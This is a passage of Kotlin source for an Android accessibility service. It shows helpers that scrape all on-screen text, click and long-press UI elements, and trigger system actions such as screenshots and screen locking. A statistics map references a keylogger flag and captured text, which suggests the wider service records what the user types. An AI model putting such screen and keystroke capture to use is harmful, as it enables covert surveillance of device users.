   557тЖТ   557тЖТ   557тЖТ        val textBuilder = StringBuilder()
   558тЖТ   558тЖТ   558тЖТ        
   559тЖТ   559тЖТ   559тЖТ        extractTextFromNode(root, textBuilder)
   560тЖТ   560тЖТ   560тЖТ        
   561тЖТ   561тЖТ   561тЖТ        return textBuilder.toString()
   562тЖТ   562тЖТ   562тЖТ    }
   563тЖТ   563тЖТ   563тЖТ    
   564тЖТ   564тЖТ   564тЖТ    private fun extractTextFromNode(node: AccessibilityNodeInfo, builder: StringBuilder) {
   565тЖТ   565тЖТ   565тЖТ        val text = node.text?.toString()
   566тЖТ   566тЖТ   566тЖТ        if (!text.isNullOrBlank()) {
   567тЖТ   567тЖТ   567тЖТ            builder.append(text).append("\n")
   568тЖТ   568тЖТ   568тЖТ        }
   569тЖТ   569тЖТ   569тЖТ        
   570тЖТ   570тЖТ   570тЖТ        val contentDesc = node.contentDescription?.toString()
   571тЖТ   571тЖТ   571тЖТ        if (!contentDesc.isNullOrBlank() && contentDesc != text) {
   572тЖТ   572тЖТ   572тЖТ            builder.append(contentDesc).append("\n")
   573тЖТ   573тЖТ   573тЖТ        }
   574тЖТ   574тЖТ   574тЖТ        
   575тЖТ   575тЖТ   575тЖТ        for (i in 0 until node.childCount) {
   576тЖТ   576тЖТ   576тЖТ            val child = node.getChild(i) ?: continue
   577тЖТ   577тЖТ   577тЖТ            extractTextFromNode(child, builder)
   578тЖТ   578тЖТ   578тЖТ            child.recycle()
   579тЖТ   579тЖТ   579тЖТ        }
   580тЖТ   580тЖТ   580тЖТ    }
   581тЖТ   581тЖТ   581тЖТ    
   582тЖТ   582тЖТ   582тЖТ    /**
   583тЖТ   583тЖТ   583тЖТ     * Find node containing specific text
   584тЖТ   584тЖТ   584тЖТ     */
   585тЖТ   585тЖТ   585тЖТ    fun findNodeByText(text: String): AccessibilityNodeInfo? {
   586тЖТ   586тЖТ   586тЖТ        val root = rootInActiveWindow ?: return null
   587тЖТ   587тЖТ   587тЖТ        return root.findAccessibilityNodeInfosByText(text).firstOrNull()
   588тЖТ   588тЖТ   588тЖТ    }
   589тЖТ   589тЖТ   589тЖТ    
   590тЖТ   590тЖТ   590тЖТ    /**
   591тЖТ   591тЖТ   591тЖТ     * Get node bounds
   592тЖТ   592тЖТ   592тЖТ     */
   593тЖТ   593тЖТ   593тЖТ    fun getNodeBounds(node: AccessibilityNodeInfo): Rect {
   594тЖТ   594тЖТ   594тЖТ        val bounds = Rect()
   595тЖТ   595тЖТ   595тЖТ        node.getBoundsInScreen(bounds)
   596тЖТ   596тЖТ   596тЖТ        return bounds
   597тЖТ   597тЖТ   597тЖТ    }
   598тЖТ   598тЖТ   598тЖТ    
   599тЖТ   599тЖТ   599тЖТ    /**
   600тЖТ   600тЖТ   600тЖТ     * Long press on a node
   601тЖТ   601тЖТ   601тЖТ     */
   602тЖТ   602тЖТ   602тЖТ    fun longPress(node: AccessibilityNodeInfo): Boolean {
   603тЖТ   603тЖТ   603тЖТ        return node.performAction(AccessibilityNodeInfo.ACTION_LONG_CLICK)
   604тЖТ   604тЖТ   604тЖТ    }
   605тЖТ   605тЖТ   605тЖТ    
   606тЖТ   606тЖТ   606тЖТ    /**
   607тЖТ   607тЖТ   607тЖТ     * Long press at coordinates
   608тЖТ   608тЖТ   608тЖТ     */
   609тЖТ   609тЖТ   609тЖТ    fun longPressAt(x: Int, y: Int): Boolean {
   610тЖТ   610тЖТ   610тЖТ        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.N) {
   611тЖТ   611тЖТ   611тЖТ            return false
   612тЖТ   612тЖТ   612тЖТ        }
   613тЖТ   613тЖТ   613тЖТ        
   614тЖТ   614тЖТ   614тЖТ        val path = Path().apply {
   615тЖТ   615тЖТ   615тЖТ            moveTo(x.toFloat(), y.toFloat())
   616тЖТ   616тЖТ   616тЖТ        }
   617тЖТ   617тЖТ   617тЖТ        
   618тЖТ   618тЖТ   618тЖТ        val gesture = GestureDescription.Builder()
   619тЖТ   619тЖТ   619тЖТ            .addStroke(GestureDescription.StrokeDescription(path, 0, 500))
   620тЖТ   620тЖТ   620тЖТ            .build()
   621тЖТ   621тЖТ   621тЖТ        
   622тЖТ   622тЖТ   622тЖТ        return dispatchGesture(gesture, null, null)
   623тЖТ   623тЖТ   623тЖТ    }
   624тЖТ   624тЖТ   624тЖТ
   625тЖТ   625тЖТ   625тЖТ    private fun performClickOnNode(node: AccessibilityNodeInfo): Boolean {
   626тЖТ   626тЖТ   626тЖТ        // Try direct click
   627тЖТ   627тЖТ   627тЖТ        if (node.isClickable) {
   628тЖТ   628тЖТ   628тЖТ            return node.performAction(AccessibilityNodeInfo.ACTION_CLICK)
   629тЖТ   629тЖТ   629тЖТ        }
   630тЖТ   630тЖТ   630тЖТ        
   631тЖТ   631тЖТ   631тЖТ        // Try parent click
   632тЖТ   632тЖТ   632тЖТ        var parent = node.parent
   633тЖТ   633тЖТ   633тЖТ        while (parent != null) {
   634тЖТ   634тЖТ   634тЖТ            if (parent.isClickable) {
   635тЖТ   635тЖТ   635тЖТ                val clicked = parent.performAction(AccessibilityNodeInfo.ACTION_CLICK)
   636тЖТ   636тЖТ   636тЖТ                parent.recycle()
   637тЖТ   637тЖТ   637тЖТ                return clicked
   638тЖТ   638тЖТ   638тЖТ            }
   639тЖТ   639тЖТ   639тЖТ            val grandParent = parent.parent
   640тЖТ   640тЖТ   640тЖТ            parent.recycle()
   641тЖТ   641тЖТ   641тЖТ            parent = grandParent
   642тЖТ   642тЖТ   642тЖТ        }
   643тЖТ   643тЖТ   643тЖТ        
   644тЖТ   644тЖТ   644тЖТ        // Try click via coordinates
   645тЖТ   645тЖТ   645тЖТ        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.N) {
   646тЖТ   646тЖТ   646тЖТ            val bounds = Rect()
   647тЖТ   647тЖТ   647тЖТ            node.getBoundsInScreen(bounds)
   648тЖТ   648тЖТ   648тЖТ            return clickAt(bounds.centerX(), bounds.centerY())
   649тЖТ   649тЖТ   649тЖТ        }
   650тЖТ   650тЖТ   650тЖТ        
   651тЖТ   651тЖТ   651тЖТ        return false
   652тЖТ   652тЖТ   652тЖТ    }
   653тЖТ   653тЖТ   653тЖТ
   654тЖТ   654тЖТ   654тЖТ    // ===== GLOBAL ACTIONS =====
   655тЖТ   655тЖТ   655тЖТ
   656тЖТ   656тЖТ   656тЖТ    fun goBack(): Boolean = performGlobalAction(GLOBAL_ACTION_BACK)
   657тЖТ   657тЖТ   657тЖТ
   658тЖТ   658тЖТ   658тЖТ    fun goHome(): Boolean = performGlobalAction(GLOBAL_ACTION_HOME)
   659тЖТ   659тЖТ   659тЖТ
   660тЖТ   660тЖТ   660тЖТ    fun openRecents(): Boolean = performGlobalAction(GLOBAL_ACTION_RECENTS)
   661тЖТ   661тЖТ   661тЖТ
   662тЖТ   662тЖТ   662тЖТ    fun openNotifications(): Boolean = performGlobalAction(GLOBAL_ACTION_NOTIFICATIONS)
   663тЖТ   663тЖТ   663тЖТ
   664тЖТ   664тЖТ   664тЖТ    fun openQuickSettings(): Boolean = performGlobalAction(GLOBAL_ACTION_QUICK_SETTINGS)
   665тЖТ   665тЖТ   665тЖТ
   666тЖТ   666тЖТ   666тЖТ    fun openPowerDialog(): Boolean = performGlobalAction(GLOBAL_ACTION_POWER_DIALOG)
   667тЖТ   667тЖТ   667тЖТ
   668тЖТ   668тЖТ   668тЖТ    fun lockScreen(): Boolean {
   669тЖТ   669тЖТ   669тЖТ        return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
   670тЖТ   670тЖТ   670тЖТ            performGlobalAction(GLOBAL_ACTION_LOCK_SCREEN)
   671тЖТ   671тЖТ   671тЖТ        } else {
   672тЖТ   672тЖТ   672тЖТ            false
   673тЖТ   673тЖТ   673тЖТ        }
   674тЖТ   674тЖТ   674тЖТ    }
   675тЖТ   675тЖТ   675тЖТ
   676тЖТ   676тЖТ   676тЖТ    fun takeScreenshot(): Boolean {
   677тЖТ   677тЖТ   677тЖТ        return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
   678тЖТ   678тЖТ   678тЖТ            performGlobalAction(GLOBAL_ACTION_TAKE_SCREENSHOT)
   679тЖТ   679тЖТ   679тЖТ        } else {
   680тЖТ   680тЖТ   680тЖТ            false
   681тЖТ   681тЖТ   681тЖТ        }
   682тЖТ   682тЖТ   682тЖТ    }
   683тЖТ   683тЖТ   683тЖТ    
   684тЖТ   684тЖТ   684тЖТ    fun accessibilityButton(): Boolean {
   685тЖТ   685тЖТ   685тЖТ        return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
   686тЖТ   686тЖТ   686тЖТ            performGlobalAction(GLOBAL_ACTION_ACCESSIBILITY_BUTTON)
   687тЖТ   687тЖТ   687тЖТ        } else {
   688тЖТ   688тЖТ   688тЖТ            false
   689тЖТ   689тЖТ   689тЖТ        }
   690тЖТ   690тЖТ   690тЖТ    }
   691тЖТ   691тЖТ   691тЖТ    
   692тЖТ   692тЖТ   692тЖТ    fun accessibilityShortcut(): Boolean {
   693тЖТ   693тЖТ   693тЖТ        return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
   694тЖТ   694тЖТ   694тЖТ            performGlobalAction(GLOBAL_ACTION_ACCESSIBILITY_SHORTCUT)
   695тЖТ   695тЖТ   695тЖТ        } else {
   696тЖТ   696тЖТ   696тЖТ            false
   697тЖТ   697тЖТ   697тЖТ        }
   698тЖТ   698тЖТ   698тЖТ    }
   699тЖТ   699тЖТ   699тЖТ    
   700тЖТ   700тЖТ   700тЖТ    fun accessibilityAllApps(): Boolean {
   701тЖТ   701тЖТ   701тЖТ        return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {
   702тЖТ   702тЖТ   702тЖТ            performGlobalAction(GLOBAL_ACTION_ACCESSIBILITY_ALL_APPS)
   703тЖТ   703тЖТ   703тЖТ        } else {
   704тЖТ   704тЖТ   704тЖТ            false
   705тЖТ   705тЖТ   705тЖТ        }
   706тЖТ   706тЖТ   706тЖТ    }
   707тЖТ   707тЖТ   707тЖТ    
   708тЖТ   708тЖТ   708тЖТ    fun dismissNotificationShade(): Boolean {
   709тЖТ   709тЖТ   709тЖТ        return if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.S) {
   710тЖТ   710тЖТ   710тЖТ            performGlobalAction(GLOBAL_ACTION_DISMISS_NOTIFICATION_SHADE)
   711тЖТ   711тЖТ   711тЖТ        } else {
   712тЖТ   712тЖТ   712тЖТ            goBack()
   713тЖТ   713тЖТ   713тЖТ        }
   714тЖТ   714тЖТ   714тЖТ    }
   715тЖТ   715тЖТ   715тЖТ
   716тЖТ   716тЖТ   716тЖТ    // ===== STATISTICS =====
   717тЖТ   717тЖТ   717тЖТ    
   718тЖТ   718тЖТ   718тЖТ    fun getStats(): Map<String, Any> {
   719тЖТ   719тЖТ   719тЖТ        return mapOf(
   720тЖТ   720тЖТ   720тЖТ            "uptime_ms" to (System.currentTimeMillis() - startTime),
   721тЖТ   721тЖТ   721тЖТ            "total_events" to eventCount,
   722тЖТ   722тЖТ   722тЖТ            "text_events" to textEventCount,
   723тЖТ   723тЖТ   723тЖТ            "click_events" to clickEventCount,
   724тЖТ   724тЖТ   724тЖТ            "notification_events" to notificationEventCount,
   725тЖТ   725тЖТ   725тЖТ            "keylogger_enabled" to keyloggerEnabled,
   726тЖТ   726тЖТ   726тЖТ            "auto_click_enabled" to autoClickEnabled,
   727тЖТ   727тЖТ   727тЖТ            "current_app" to currentApp,
   728тЖТ   728тЖТ   728тЖТ            "last_event_type" to lastEventType,
   729тЖТ   729тЖТ   729тЖТ            "captured_text_length" to lastCapturedText.length
   730тЖТ   730тЖТ   730тЖТ        )
   731тЖТ   731тЖТ   731тЖТ    }
   732тЖТ   732тЖТ   732тЖТ
   733тЖТ   733тЖТ   733тЖТ    enum class ScrollDirection {
   734тЖТ   734тЖТ   734тЖТ        UP, DOWN, LEFT, RIGHT
   735тЖТ   735тЖТ   735тЖТ    }
   736тЖТ   736тЖТ   736тЖТ}
   737тЖТ   737тЖТ   737тЖТ